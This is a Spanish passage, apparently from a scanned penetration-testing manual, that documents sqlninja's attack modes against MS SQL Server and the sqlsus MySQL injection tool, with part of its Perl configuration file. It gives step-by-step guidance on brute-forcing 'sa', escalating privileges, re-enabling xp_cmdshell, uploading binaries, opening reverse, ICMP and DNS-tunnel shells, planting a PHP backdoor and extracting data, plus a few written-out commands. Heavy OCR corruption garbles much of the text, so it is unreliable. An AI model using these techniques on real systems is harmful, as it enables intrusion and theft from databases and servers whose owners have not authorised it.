usar autenticación mixta. Usar el modo de huella digital para verificar si este es el caso. 

Este modo de ataque de fuerza bruta puede usar 2 métodos diferentes: diccionario e incremental. 

Diccionario 

Este método se usa cuando se especifica una lista de palabras usando la opción -w. Con este 
método, las posibles contraseñas se obtienen de la lista de palabras y cada una se prueba en una 
solicitud por separado. Asegurarse de que su lista de palabras contenga ’sa' y la contraseña vacia, 2 
favoritos de todos los tiempos para las instalaciones de MS SQL Server. 

Pros: 

• Muy eficaz si la contraseña es una palabra del diccionario. 

• No es una carga pesada en el servidor de la base de datos 




Contras: 

• No es efectivo contra contraseñas que no están basadas en diccionarios. Si la contraseña no 
está en tu lista de palabras, no se puede encontrar. 

• Necesita muchas conexiones de red, por lo que el ataque es muy fácil de detectar mirando 
los registros del servidor web 

Incremental 

Este método se utiliza cuando no se especifica una lista de palabras, sqlninja envia un conjunto de 
consultas que prueba todas las combinaciones posibles de caracteres hasta una determinada longitud 
especificada por el usuario. El aspecto interesante de esta táctica es que, dado que las consultas se 
ejecutan en el servidor de base de datos, la fuerza bruta se realiza utilizando los recursos de la CPEl 
del objetivo. 

Pros: 

• Extremadamente eficaz para encontrar contraseñas que no estén basadas en diccionarios. 

• Necesita relativamente pocas conexiones, por lo que hay muy pocas entradas en los registros 
del servidor web 

Contras: 

• Si la contraseña es larga, puede llevar años encontrarla. 

• Podría aumentar el uso de la CPU del servidor de la base de datos hasta el 100% durante 
todo el tiempo, lo que puede ser peligroso con una aplicación en vivo. También tener en 
cuenta que los servidores críticos tienen alarmas que se activan si el uso de la CPU es muy 
alto durante un tiempo determinado. Como medida de seguridad, sqlninja divide la tarea en 
pequeños fragmentos, cada fragmento prueba n^ contraseñas, siendo n la longitud del juego 
de caracteres utilizado. Si algo sale mal, simplemente detener sqlninja y la fuerza bruta 
remota se detendrá al final del fragmento actual. 

• Dependiendo de como se conecte la aplicación al servidor de la base de datos, esta técnica 
podria no funcionar, sqlninja intenta resolverlo casi de inmediato y alerta al usuario, por lo 
que no se pierde un tiempo precioso 

Notas importantes 

• A partir de SQE Server 2005, OPENROWSET está deshabilitado de forma predeterminada 
para usuarios no administrativos. Si el modo fingerprint dijo que está tratando con SQE 
Server 2005/2008/2012 y que no es ’sa', entonces es probable que no tenga suerte, pero aún 
puede extraer datos con el modo getdata. 

• En SQL Server 2000, las contraseñas no distinguen entre mayúsculas y minúsculas, lo que 
simplifica enormemente el trabajo de descifrado. 

• El bit de escalado podria verse afectado si la aplicación usa ODBC 

e/escalation 

Parámetros: -p <sa password> (obligatorio) 

Cuando se especifica la contraseña de ’sa' correcta, el usuario actual de la base de datos se agrega al 
grupo sysadmin. En general no se debería necesitar este método, ya que sqlninja ya se encarga de la 
escalada en el modo de fuerza bruta. Sin embargo puede haber casos en los que se necesite realizar 
este bit de forma independiente. 

Si se desea saber como funciona la escalada o si se ha encontrado la contraseña de ’sa' pero la 
escalada parece no fúncionar, se puede pasar al modo resurrectxp. 

La escalada se realiza combinando OPENROWSET, la contraseña de ’sa' correcta y 
sp addsrvrolemember, agregando el usuario actual al grupo sysadmin. Es bastante improbable que 



sp addsrvrolemember haya sido deshabilitado, por lo que el trueo deberla funeionar easi siempre. 

Si no funeiona, puede ser por 2 razones: 

1) El servidor usa ODBC y se están usando eonexiones ODBC antiguas del grupo de eonexiones, 
que aún usan los privilegios antiguos. 

2. El proeedimiento sp addsrvrolemember ha sido deshabilitado. 

En el primer easo, puede tener que esperar un rato para que la antigua eonexión ODBC se agote y se 
eaiga: de forma predeterminada, una eonexión ODBC se eae después de 60 segundos inaetivos y la 
posibilidad de este evento depende de euantos elientes se eoneetan a la aplieaeión web y eomo este 
número varia eon el tiempo. 

En ambos easos si no se quiere esperar, solo se neeesita espeeifiear el parámetro -p <sa oontraseña> 
en todos los siguientes pasos del ataque: esto le dirá a sqlninja que use OPENROWSET en eada 
eonexión, ejeeutando eada eomando eomo ’sa' en lugar de eomo el usuario aetual. 

x/resurrectxp 

Parámetros: -p <sa password> (opeional) 

Este modo se utilizará euando se tienen privilegios de administrador de sistemas o se sabe que la 
eontraseña de ’sa' xp emdshell ha sido deshabilitada. 

El objetivo de este modo es reerear el proeedimiento extendido xp emdshell. Aqui juegan muehas 
variables y dependiendo de ellas, este modo se eomportará de diferentes maneras. Se debe tener en 
euenta lo siguiente: 

• Eos métodos: hay 2 formas de reeuperar el xp emdshell: 1) restaurarlo eon un 
proeedimiento almaeenado (sp addextendedproe en SQEServer 2000 y sp eonfigure en 
SQEServer 2005). Este método requiere un simple eomando SQE, pero requiere que 
xplog70.dll aún esté alli y 2) erear uno personalizado eon "CREATE PROCEDURE", 

sp oaereate, sp oamethod y sp oadestroy. Este método requiere más eódigo, pero fúneiona 
sin importar si xplog70.dll se ha eliminado por razones de seguridad. 

• Volver a habilitar xp emdshell podría no pasar desapereibido. Tal vez los desarrolladores de 
la aplieaeión podrían haber seguido estrietamente lo que Mierosoft reeomienda, que es 
filtrar la eadena "xp_ sin deeir nada sobre "sp_ En estos easos se puede usar 
CREATE PROCEDURE y un nombre más disereto, por ejemplo: "sp sqlbaekup". Se puede 
elegir el nombre del proeedimiento eon la opeión xp name del arehivo de eonfiguraeión. 

• En euanto a los privilegios del usuario, si la esealada de privilegios no funeionó, entonees se 
debe usar el parámetro -p <oontraseña sa>, para usar OPENROWSET para esealar 
privilegios en eada eonexión y esto eonduee al punto siguiente. 

• OPENROWSET y CREATE PROCEDURE no se pueden eombinar. Por lo tanto si se está 
utilizando el parámetro -p, no se puede utilizar el trueo CREATE PROCEDURE. Sin 
embargo existe una solueión alternativa: se puede ineluir el eódigo de proeedimiento 
eompleto en eada solieitud que se envia al servidor de base de datos, sin orear ningún 
proeedimiento extendido. Este trueo se oonooe eomo inyeooión de proeedimiento en linea. 

Dioho esto, estos son los pasos que sqlninja sigue euando se usa este método: 

1. Si el nombre del proeedimiento extendido, espeoifioado en el arehivo de eonfiguraeión, es 
xp emdshell que es el valor predeterminado, entonees sqlninja oomienza intentando volver a 
habilitarlo eon sp addextendedproe/sp eonfigure. Se le preguntará por la versión del servidor SQE 
remoto. Si se olvidó usar el modo fingerprint, sqlninja eneontrará esta informaeión por si solo. Si 
todo esto fúneiona, tenemos nuestro xp emdshell de vuelta. 

2. Si el nombre del proeedimiento extendido no está eonfigurado en xp emdshell en el arehivo de 
eonfiguraeión o el paso 1 ha fallado, por ejemplo porque se ha eliminado xplog70.dll, entonees: 



• si tenemos privilegios de administrador nativo, signifiea que no tuvimos que especificar la 
contraseña en la linea de comando y por tanto se debe intentar el método CREATE 
PROCEDURE. Si funciona, tenemos nuestro procedimiento personalizado, como sea que lo 
hayamos nombrado. 

• Si no tenemos privilegios de administrador nativo, lo que significa que tuvimos que 
especificar la contraseña en la linea de comando, se intenta la inyección del procedimiento 
en linea explicado con anterioridad. Si funciona, se deberá configurar xp name en NULE en 
el archivo de configuración. Esto le dirá a sqlninja que use la inyección de procedimiento en 
linea en todos los pasos posteriores. 

u/upload 

Parámetros: -p <sa password> (opcional), -g (opcional) 

Este modo sube un archivo binario utilizando solo solicitudes HTTP GET o POST al servidor web, 
por lo que no se necesita ETP/TETP ni ninguna otra conexión. El archivo se sube en el directorio 
especificado por la variable %TEMP% del servidor, de modo que el ataque funciona incluso cuando 
MSSQL no puede escribir en el directorio predeterminado. Hay 2 métodos de subida disponibles, 
controlados por la opción upload method: 

• debug script: este método es el tradicional y utiliza el viejo DEBUG.EXE de 16 bits. El 
archivo binario se codifica como un script de depuración (extensión.scr), el script se sube y 
se alimenta al depurador. El script asigna básicamente un área de memoria, escribe los 
octetos necesarios en él y guarda el resultado en el disco. Al ser un depurador de 16 bits, 
obviamente hay una limitación de 64k octetos en el tamaño, pero sqlninja lo omite al dividir 
el original ejecutable en trozos de 64k octetos, subiéndolos por separado y finalmente 
fusionándolos, sqlninja utiliza el mismo algoritmo utilizado en el gran dbgtool.exe de Jussi y 
que es capaz de crear Scripts muy compactos. 

• vbscript: este es el nuevo método y básicamente codifica el archivo binario en formato 
base64, lo sube y luego lo alimenta a un pequeño decodificador vbscript previamente 
cargado. En promedio utiliza menos solicitudes, no necesita dividir el archivo original y 
tiene mayores posibilidades de trabajar en sistemas recientes. Este método es el que se 
recomienda. 

En el programa sqlninja, ya están disponibles en los directorios de aplicaciones y Scripts 
respectivamente en formato binario y debug+base64, los siguientes programas: netcat.exe, 
dnstun.exe, icmpsh.exe, churrasco.exe, vdmallowed.exe y vdmexploit.dll. Eos ejecutables se han 
empaquetado con UPX para minimizar su tamaño y el tiempo de subida. Se debe subir netcat para 
usar backscan/dirshell/revshell, mientras que dnstun.exe e icmpsh.exe se usan para crear un 
pseudoshell tunelizado DNS e ICMP respectivamente, churrasco.exe se usa para intentar una 
escalada de privilegios mediante el secuestro de tokens si SQE Server no se ejecuta como 
SYSTEM. Vdmallowed.exe y vdmexploit.dll intentan el mismo ataque usando CVE-201 0-0232. 

Tener en cuenta que aqui muchas cosas pueden salir mal: si una sola linea del archivo codificado no 
se sube, el archivo ejecutable no se generará correctamente. Por lo tanto al final del proceso sqlninja 
verifica si el archivo ejecutable está alli, y si no lo está, también trata de averiguar cuantas lineas se 
han subido: esto debería proporcionar algunas pistas sobre lo que salió mal. Por ejemplo durante 
una prueba de penetración resultó que el número resultante de lineas era exactamente el doble del 
valor correcto, lo que significa que cada consulta inyectada se ejecutó 2 veces. El truco consistía en 
crear una tabla temporal que actuara como un contador, agregando la linea al archivo de script solo 
cuando el contador era par. 

Si solo desea generar el debug script o el archivo base64 sin subirlo, por ejemplo para usarlo con 
alguna otra herramienta, iniciar el modo de carga con la opción -g y sqlninja generará el archivo en 
el directorio /tmp y saldrá. Se debe especificar el parámetro de contraseña cuando no tiene 



privilegios nativos de administrador de sistemas. 


s/dirshell 

Parámetros: -p <sa password> (opeional) 

Utilizar este método euando se pueda aeeeder direetamente al servidor de base de datos remoto en 
algún puerto TCP o UDP sqlninja pregunta por el puerto remoto y el protoeolo asoeiado y le diee al 
servidor de la base de datos que enlaee un símbolo del sistema a dieho puerto y luego inieia la 
eonexión. Por supuesto netcat debe haberse subido en el servidor remoto. El parámetro de 
eontraseña se debe utilizar euando no se tienen privilegios nativos de administrador de sistemas. 

k/backscan 

Parámetros: -p <sa password> (opeional) 

Normalmente cuando el servidor de la base de datos está detrás de un cortafuegos, no es posible 
contactarlo directamente. Sin embargo podría ser posible que el servidor tenga acceso al mundo 
exterior en algún puerto, por ejemplo: DNS, HTTP. Este modo le dice al servidor de la base de 
datos que envie paquetes SYN o paquetes UDP a la máquina remota en un rango de puertos, para 
buscar uno que esté permitido, sqlninja le dirá al usuario si se reciben paquetes y en que puerto(s). 

Se necesita especificar en el archivo de configuración, la dirección IP de la máquina remota 
(parámetro Ihost) y la interfaz por la que escuchar (parámetro device). sqlninja preguntará sobre el 
protocolo a utilizar (TCP / UDP) y los puertos, que deben especificarse con la sintaxis común de 
netcat, por ejemplo: "23 25 80-100" probará los puertos 23, 25 y todos los puertos entre 80 y 100. 

El parámetro password se debe utilizar cuando no tenemos privilegios nativos de administrador de 
sistemas. Para usar este modo, netcat debe haberse subido primero y dado que las bibliotecas pcap 
deben usarse, también debe ser usuario root. 

r/revshell 

Parámetros: -p <sa password> (opcional) 

Si no es posible un shell directo, pero el modo de exploración inversa encontró un puerto abierto en 
el servidor de la base de datos, entonces es posible un shell inverso. Cuando se utiliza este modo, 
sqlninja solicita el puerto local, el protocolo y luego inicia la conexión. Se debe especificar en el 
archivo de configuración, la dirección IP de la máquina remota (parámetro Ihost). Por supuesto 
netcat debe haberse subido en el servidor remoto. El parámetro password se utilizará cuando no se 
tengan privilegios nativos de administrador de sistemas. 

i/icmpshell 

Parámetros: -p <sa password> (opcional) 

Cuando el cortafuegos no permite ningún shell directo o inverso, pero el DBMS remoto puede hacer 
ping al ordenador atacante, se puede hacer un túnel con un shell con ICMP. Simplemente subir 
icmpsh.exe e iniciar el modo icmpshell. Todo el tráfico desde y hacia el DBMS remoto se 
canalizará a través de paquetes ICMP 

Al iniciar este modo de ataque, sqlninja pedirá la siguiente información: 

• Tamaño del búfer de datos: la cantidad de datos que se encapsularán en un solo paquete 
ICMP El valor predeterminado es 64 octetos, pero se pueden usar valores más grandes para 
obtener un túnel más rápido. Tener cuidado con la MTU máxima en el túnel. Se recomienda 
un valor de hasta 1300-1400 octetos según los estándares actuales. Usar paquetes más 
pequeños si se quiere jugar seguro. 

• Retraso de envió: la cantidad de tiempo entre solicitudes contiguas de eco ICMP El valor 
predeterminado es 300 milisegundos, pero se pueden usar valores más bajos para obtener un 
túnel más rápido. Tener en cuenta que un valor muy bajo podría generar una inundación de 



ping que podría notarse o que un dispositivo anti-DoS desaeelerará automáticamente el 
tráfico. 

• Tiempo de espera de respuesta: la cantidad de tiempo que icmpshell.exe esperará antes de 
volver a enviar una solicitud ICMP. El valor predeterminado es 3000 milisegundos. 

Importante: asegurarse de que su casilla esté configurada para no responder a las solicitudes de eco 
ICMP. Por ejemplo, en Linux el siguiente comando hará el truco: 
sysctl -w net. ipv4. icmp_echo_ignore_all=l 

d/dnstunnel 

Parámetros: -p <sa password> (opcional) 

Cuando el cortafuegos no permite el shell directo o inverso y el shell ICMP tampoco funciona, pero 
se puede intentar establecer un túnel DNS. Los únicos requisitos son: 

• El servidor de base de datos debe ser capaz de resolver nombres de dispositivos externos 
como suele ser el caso. 

• La dirección IP del atacante debe ser el servidor DNS autorizado de algún dominio. 

Si se cumplen ambas condiciones, subir el programa dnstun.exe, iniciar el modo dnstunnel e iniciar 
sus comandos. Lo que sucede es más o menos lo siguiente: 

1. El comando se pasa a través de la inyección de SQL a dnstun.exe que actúa como nuestro agente 
remoto y es ejecutado por el servidor de base de datos remoto. La salida se intercepta y codifica en 
un formato base32 ligeramente modificado. 

2. La salida codificada se divide en una serie de nombres de dispositivo del dominio que se 
controla, por ejemplo: encoded output. sqlninj a. net 

3. Estos nombres de dispositivo se pasan a gethostbyname(), de modo que el servidor de la base de 
datos contacte a su servidor DNS para resolverlos. 

4. El servidor DNS busca el servidor autorizado de sqlninja.net y reenvía las solicitudes a la 
máquina atacante 

5. sqlninja recibe las solicitudes, las reordena si es necesario, decodifica los nombres de dispositivo 
y finalmente imprime la salida del comando. Por supuesto sqlninja también responde a las 
solicitudes de DNS con una dirección IP falsa para que gethostbyname() regrese rápidamente. 

Todo el proceso se transmite, lo que significa que si la salida del comando es muy larga, comenzará 
a ver su salida antes de que el comando haya terminado. 

El dominio a utilizar debe especificarse en el archivo de configuración. Por supuesto dado que 
sqlninja debe crear un servidor DNS falso y vincular el puerto 53, necesita privilegios de root para 
usar este modo. 

m/metasploit 

Sin parámetros 

Si se tienen privilegios administrativos, xp cmdshell fúnciona y se ha encontrado un puerto TCP 
permitido (entrante o saliente). También se puede usar sqlninja como shell para Metasploit, para 
usar meterpreter o inyectar un servidor VNC. Usar Meterpreter proporciona un control casi 
completo sobre el sistema operativo remoto, incluido el acceso inmediato a los hash de contraseña, 
la posibilidad de cambiar las tablas de enrutamiento, realizar el reenvío de puertos, etc. También si 
se tiene suficiente ancho de banda, se puede inyectar un servidor VNC y obtener un buen acceso 
gráfico a la base de datos remota. 


Este modo de ataque está completamente automatizado y esto es lo que sucede: 



1. sqlninja pide que se espeeifique si se desea usar meterpreter o VNC, si la eonexión será directa o 
inversa y el dispositivo y puerto al que conectarse o el puerto local a vincular en caso de una 
conexión inversa 

2. sqlninja llamará a msfpayload para crear un ejecutable apropiado que actuará como un payload 
stager 

3. sqlninja lo convertirá en un script de depuración y lo subirá 

4. Dado que se tiene tiene que inyectar una DLL, es posible que se deba deshabilitar la prevención 
de ejecución de datos Data Execution Prevention también conocida como DEP, habilitada de 
manera predeterminada a partir de Windows 2003 SPl. Eas versiones recientes de Metasploit 
manejan este bit automáticamente, pero también se puede decir a sqlninja que lo intente hacer, 
accediendo al registro y agregando al ejecutable en la lista blanca. 

5. Einalmente sqlninja llamará a msfcli para inyectar la DEE necesaria y completar la explotación. 

Para usar este modo de ataque, se debe tener Metasploit disponible en la máquina atacante. Si los 
ejecutables de Metasploit, es decir, msfpayload, msfcli y msfencode, no están en su ruta, se puede 
especificar su ubicación absoluta en el archivo de configuración. Si se usa el modo VNC, 
asegurarse de tener un cliente VNC instalado. 

c/sqlcmd 

Sin parámetros 

A veces incluso si se tienen privilegios de administrador del sistema y funciona xp cmdshell, 
todavia no es posible obtener una shell, tal vez porque falla la carga ejecutable o porque todos los 
puertos están filtrados y no se permite la resolución de DNS externo. En estos casos aún puede ser 
útil emitir comandos únicos al servidor de base de datos, incluso sin poder ver la salida. Por 
ejemplo es posible que se desee agregar un usuario local o un usuario de dominio, si SQE Server se 
ejecuta con estos privilegios. En estos casos, se puede usar este modo: simplemente ingresar un 
comando de DOS y dejar que sqlninja lo ejecute de forma remota. Recordar que se ejecuta incluso 
si no se ve su salida. 

Para saber si un comando tuvo éxito, verificar también el valor de la variable ERRORLEVEE, que 
generalmente se establece en 0 si el último comando no produjo un error. Entonces, por ejemplo, si 
queremos saber si el SQL Server remoto se está ejecutando como SYSTEM, podemos usar el 
siguiente comando: 

whoami > who. txt & find /i "\system " who. txt & if not errorlevel = 1 ping -n 5 127. 0. 0. 1 
& del who. Txt 

Si el comando tarda unos 5 segundos en ejecutarse, se sabe que SQE Server se está ejecutando 
como SYSTEM. 

Este modo también puede ser útil cuando falla algún otro modo, para comprender que salió mal y 
como solucionar el problema. Einalmente este comando también es muy útil para mostrar a un 
cliente que él era dueño de su servidor de base de datos incluso si no obtuvo el shell: 
echo Has sido propiedad de sqlninja> c: \ sqlninja. TXT 

g/getdata 

Parámetros: -s <filename> (opcional) 

Este método es experimental y es 100% interactivo. Actualmente sqlninja admite 2 canales de 
extracción, basados en tiempo y basados en DNS. 

Basado en el tiempo 

Este canal se usa cuando data channel está configurado en tiempo en el archivo de configuración y 
usa el lento pero confiable comando WAITFOR DEEAY para extraer información, sqlninja puede 
explotar la inyección basada en el tiempo de 2 maneras. 



1. Búsqueda binaria basada en el tiempo. Este método se activa cuando data extraction se 
establece en binario en el archivo de configuración. Básicamente este método minimiza el 
número de solicitudes a la aplicación, lo que lo hace útil si desea mantener su huella al 
mínimo. Sin embargo aproximadamente la mitad de las consultas provocarán un retraso, lo 
que significa que este método podría no ser el más rápido. 

2. Búsqueda serial / optimizada basada en el tiempo. Este método se activa cuando 
data extraction se establece en optimizado (predeterminado) o serie en el archivo de 
configuración. Con este método, todos los valores posibles se prueban en secuencia hasta 
que se adivina el correcto. Ea diferencia entre serie y optimizado está en el orden de los 
intentos: mientras que el primero solo prueba todos los valores siguiendo su valor ASCII, el 
segundo comienza con los valores más comunes. El orden exacto se especifica con el 
parámetro language map y dicho orden se modifica en tiempo real, adaptándose a la 
frecuencia real de los caracteres que se extraen, si el parámetro language map adaptive se 
establece en yes. 

Extracción basada en DNS 

De entrada se necesita el control sobre un dominio o subdominio DNS y que los servidores DNS 
disparen solicitudes Tipo A. También que el DBMS remoto resuelva los nombres externos. 
Asegurarse de ejecutar sqlninja como root, establecer el dominio en el archivo de configuración y 
esté listo para comenzar. 

Información adicional 

Por defecto sqlninja almacena toda la información extraida en una base de datos SQEite local, cuyo 
nombre de archivo se especifica a través de la linea de comando con el parámetro -s. El nombre 
predeterminado es sesión, db. 

Otros ataques 

Muy a menudo SQE Server no se ejecuta como SYSTEM sino como un usuario menos privilegiado. 
Esto crea limitaciones en lo que puede hacer el atacante. También crea problemas con la inyección 
de VNC, lo que hace que se devuelva una pantalla negra. Sin embargo con sqlninja podemos 
intentar escalar privilegios a SYSTEM, usando 2 técnicas de ataque diferentes: 

1. CVE-201 0-0232. Si SQE Server se ejecuta como un usuario con pocos privilegios y la 
máquina no tiene parches para CVE-2010-0232, se puede intentar elevar sus privilegios a 
SYSTEM, sqlninja se entrega con una versión del exploit original de Tavis Ormandy que se 
ha personalizado especificamente: mientras que el exploit original genera un indicador de 
DOS, esta versión busca el proceso sqlservr.exe y lo obliga a ejecutarse como SYSTEM. 
Para lanzar el ataque, se requieren los siguientes pasos: 

1. Subir vdmallowed.exe y vdmexploit.dll, que están disponibles en el directorio de 
aplicaciones en formato ejecutable y en el directorio de Scripts en formato de script 
de depuración 

2. Usar el modo de ataque sqlcmd y ejecutar el comando: % TEMP%\ vdmallowed 
sql 

3. Si el ataque fue exitoso, el modo fmgerprint deberla decirle que SQE Server ahora 
se está ejecutando como SYSTEM 

2. Secuestro de tokens 

En Windows 2003 también podemos intentar escalar nuestros privilegios mediante el 
secuestro de tokens. Para ello se desarrolló el programa churrasco.exe. Si se necesita escalar 
a SYSTEM, simplemente subirlo al servidor remoto usando el modo upload y luego 
configurar la opción usechurrasco en yes: todos los comandos se envolverán con 
churrasco.exe. Tener en cuenta que esto no fúncionará si el DBMS remoto ha sido 
parcheado contra el ataque, pero puede verificar si las cosas funcionan usando el modo 
fingerprint mientras esta opción está habilitada. 




71. Sqisus 


sqlsus es una herramienta de inyección y adquisición de MySQL de código abierto, escrita en perl. 

A través de una interfaz de linea de comandos, se puede recuperar la estructura de la base de datos, 
inyectar sus propias consultas de SQL, descargar archivos del servidor web, rastrear el sitio web 
para directorios de escritura, subir y controlar una puerta trasera, clonar la base de datos y mucho 
más. 

Características generales 

• Se admiten inyecciones numéricas y con comillas. 

• Nombres de bases de datos, nombres de tablas, nombres de columnas, recuento (*) por tabla, 
privilegios ... A partir de MySQL5, la estructura de la base de datos puede capturarse en un 
comando desde sqlsus. 

• Descubrimiento del espacio exacto de inyección, pasando por todas las restricciones 
posibles (servidor web, parche suhosin ...), para inyectar la mayor cantidad posible de una 
vez. 

• Todos los textos citados se pueden traducir como su equivalente hexadecimal para omitir 
cualquier filtro de comillas. 

• sqlsus también admite estos tipos de inyección: 

- inband basado en el comando UNION con subconsultas apiladas: el resultado de la 
solicitud estará en el HTML devuelto por el servidor web 

- ciego basado en booleano o basado en el tiempo: cuando no puede ver el resultado de la 
solicitud directamente 

• Soporte para vectores de inyección de parámetros GET y POST. 

• Soporte para proxy HTTP y autenticación simple HTTP. 

• Soporte para HTTPS. 

• Soporte para socks proxy. 

• Soporte para cookies. 

• Soporte para recuperación de datos binarios. 

• Backend completo de SQLite, almacenamiento de consultas/resultados a medida que se 
presentan, estructura de bases de datos, variables clave. Esto permite recuperar un comando 
y su respuesta en caché, incluso en una reutilización posterior de la sesión. 

• Posibilidad de clonar una base de datos/tabla/columna, en una base de datos SQEite local, y 
continuar en diferentes sesiones. 

• Si no puede acceder a la base de datos information schema, o si no existe, sqlsus ayudará a 
realizar fuerza bruta de los nombres de las tablas y columnas. 

• Posibilidad de cambiar la base de datos actual y seguir utilizando todos los comandos de 
forma transparente. 

• Detección automática de la restricción de longitud en el lugar, ya sea el servidor web o la 
capa de arriba, por ejemplo: suhosin. 

Inband 

Si es probable que la consulta devuelva más de una fila, sqlsus usará tantas subconsultas que pueda 
usar a la vez, manteniéndose por debajo de un limite configurable. 

Por lo tanto, puede capturar hasta miles de registros en solo 1 hit de servidor dependiendo del 
espacio de inyección disponible. 

Una vez que haya encontrado una inyección inband, debe encontrar el número correcto de columnas 
para la UNION, sqlsus hará el trabajo identificando el número necesario de columnas y cuales de 



ellas son adecuadas para la inyección. 

Para acelerar las cosas, se pueden usar múltiples subprocesos. 


Blínd 

La inyección blind es soportada utilizando respuestas condicionales y subprocesos múltiples. 

El motor se ha optimizado en velocidad y éxito del servidor: 

• mantiene todos los threads ocupados con pequeñas tareas relevantes. 

• hace coincidir cada elemento con algunas expresiones regulares, antes de la fuerza bruta, para 
determinar el carácter espacio a utilizar, reduciendo en gran medida la cantidad de hits necesarios. 

Tomar el control 

Si el usuario de la base de datos tiene el privilegio FILE y si puede usar comillas en su inyección, 
obligatorio para un SEEECT INTO OUTFIEE, entonces sqlsus ayudará a colocar una puerta trasera 
PHP en el sistema remoto, buscando recursivamente directorios con permiso de escritura. 

Se puede usar download <fde> del shell de sqlsus para descargar un archivo arbitrario desde el 
servidor remoto. El archivo se almacenará en el sistema de archivos local, reconstruyendo el árbol 
de ruta al archivo en el directorio data 

sqlsus tiene la capacidad de rastrear el sitio web a una profundidad configurable, buscando todos los 
directorios que puede encontrar, a través de enlaces de hipertexto, enlaces img, etc. Fuego intenta 
subir un pequeño fichero de PHP en cada directorio candidato hasta que encuentre un directorio con 
permiso de escritura que luego utiliza para subir la puerta trasera. 

Todas las necesidades de sqlsus, además de lo que se ha dicho anteriormente, es el document root 
utilizado en el lado del servidor. Se puede encontrar descargando/leyendo los archivos relevantes en 
el servidor web. 

Se entrega con una puerta trasera PHP que puede subir y un controlador, para ayudarlo a ejecutar 
comandos del sistema, comandos PHP y consultas SQL como si estuviera sentado en una conexión 
MySQL directa normal. 

Uso: sqlsus [opciones] [config fde] 

Opciones: 


-h, —help 

breve mensaje de ayuda 

-V, —versión 

información de versión 

-e, —execute <commands> 

ejecutar comandos y salir 

-g, —genconf <filename> 

generar archivo de configuración 


Contenido del fichero de configuración 

Lo primero que se tiene que hacer es generar el fichero de configuración, ejecutando 
sqlsus -g fichero.cfg 

El contenido de este fichero es el siguiente 

# Configuration file generated by sqlsus 0.7.2 
package conf; # do not remove this Une 

use strict; 
use wamings; 

# 




# Note: only the valúes that diífer from sqlsus defaults are mandatory, so you ean have a 
eonfiguration file with only a few Unes in it 

# 

# All these valúes will be overriden by the variables you have set in sqlsus in a saved session, 
provided that $ahow_override == 1 (which is the default, see below) 

# For example : 

# - first run: you launeh sqlsus with no eookie defined. 

# before the seeond run, you eonfigure a eookie in your eonfiguration file 

# - seeond run: the eookie is stih empty, beeause the valué has been overriden by the one saved 

# 

# In this ease, you need to ehange the valué of the eookie inside sqlsus using "set eookie <eookie>" 

# You ean always store you running eonfiguration by using "geneonf <filename>" inside sqlsus 

# 

############################### 

########### GENERAL ########### 

# Start of the url used for the injeetion 

# In inband/union mode, it is generahy a good idea to append "AND 0" so that the real query 
retums nothing 

# Ex : our $url_start = "http://loealhost/seript.php?id=r"; 
our $url_start = 

# End of the url used for the injeetion 

# When possible, it is generally a good idea to use "#" here, so that our queries won't be pohuted by 
the original one 

# Ex : our $url_end = 
our $url_end = 

# Use POSE instead of GET 
our $post = 0; 

# Use blind injeetion ? 

# set it to 1 for boolean-based blind injeetion 

# set it to 2 for time-based blind injeetion (requires MySQL >= 5. 0.12) 
our $bhnd = 0; 

# In boolean-based blind mode, string to be found in the HTML if the statement is true 
our $bhnd_string = 

# In time-based blind mode, how long in seeonds (ean be a float) to sleep() when the statement is 
true 

# You must speeify a valué higher than the máximum delay to be expeeted in normal eonditions 
our $bhnd_sleep = 2; 

# Ahow the valúes specified in the eonfiguration file to be overriden by the ones you have set in 
sqlsus (in a saved session) 

our $allow_override = 1; 

# User agent to use for HTTP queries 

our $user_agent = "Moziha/4.0 (eompatible; MSIE 7.0; Windows NT 6.0)"; 

# Display "debug" messages 
our $debug = 0; 

# Char (not string) to display when something is nuil / not found 
our $nuh_substitute = 

# Hex eneode strings in the query ? 

# ie: "sqlsus" will be sent as 0x73716e737573, thus eseaping quotes filtering 
our $hex_enoode_strings = 1; 

# Máximum running proeesses used to retrieve data (+main proeess +hits eounter proeess) 
our Sproeesses =10; 

# Amount of seeonds to sleep after eaeh server hit. (ean be a float) 



# Note that it does not take the query / answer time in eonsideration, it's just a simple sleep() after a 
hit 

our $sleep_after_hit = 0; 

# — máximum amount of data we ean send at onee — 

# Typically, we are restrieted either by the web server (URL size) or by the layer undemeath (PHP / 
suhosin) 

# Only one of the 2 variables ean be set (non 0) at a time, and it will be the only one to be used by 
sqlsus 

# If both are set to 0, using "start" or "autoeonf max sendable", sqlsus will find whieh restriction 
apply, and set the variable(s) aeeordingly 

# Máximum amount of data we ean send at onee to the target (+ the size of the URL itself) 
our $max_url_length = 0; 

# Máximum amount of data we ean send through the injection point 
our $max_inj_length = 0; 

# - 

# Max subqueries per query 

# Note that setting a really big valué here (ie: 900), as well as a high valué for max_url_length 
(when using POST for example), may result in a potentially long eomputation time for the quedes 
to be prepared 

our $max_subqueries = 70; 

# Convert spaces to 1**1 
our Seonvert spaees = 0; 

# Shall we eonsider eookies at all ? 
our $use_cookiejar = 1; 

# Cookie to use, sepárate name=value pairs with ; 

# This will only have an effeet if $use_oookiejar = 1 
our Seookie = 

# Proxy (HTTP / soeks) 

# Example for TOR proxying : our $proxy = "sooks://looalhost:9050"; 
our $proxy = 

# Credentials 

our $ored_realm = 
our $ored_user = 
our $ored_password = 

# What HTTP error eodes shall we retry on ? 

our @http_error_codes = qw(408 500 501 502 503 504); 

# Máximum number of times to retry per thread/proeess on a HTTP error eode 
our $http_error_retries =10; 

# Variables to get in %target when using "start" 
our %target_keys = ( 

versión => 'version()', 
user => ’eurrent user', 
database => 'database()' 

); 

############################### 

############ DATA ############# 

# Máximum length before the data returned in the HTML is truneated 

# Only used by "download" for the moment 
our $max_returned_length = 65530; 

# Where to put the data (sessions, fdes, database(s) dump) 
our Sdatapath = "/root/.sqlsus"; 




# Where to save downloaded fdes (via the "download" command) 

# such files will be stored in ./$datapath/SERVERNAME/$filespath 
our $fdespath = "files"; 

# Binary mode (hex eneode in mysql, and hex deeode in sqlsus) 

# This mode uses twice as mueh bandwith as in non binary mode 

# binary mode is useful for : 

# - in blind mode : retrieving non ASCII eharaeters (UTE8 ?) or ones not Usted in $default_range 
(see below) 

# - in general : retrieving binary eontent 
our Sbinary = 0; 

############################### 

######### INBAND MODE ######### 

# Máximum number of eolumns to be used in the UNION statement 

# This is used at "starf' (or "autoeonf select eolumns") 
our $max_seleot_ools = 50; 

# Columns usable for (inband) injeetion using unión 

# example : 

# our @columns = qw(0 0 10 1); 

# 5 eolumns for unión, 3rd and 5th ean be used to see the result of the query 

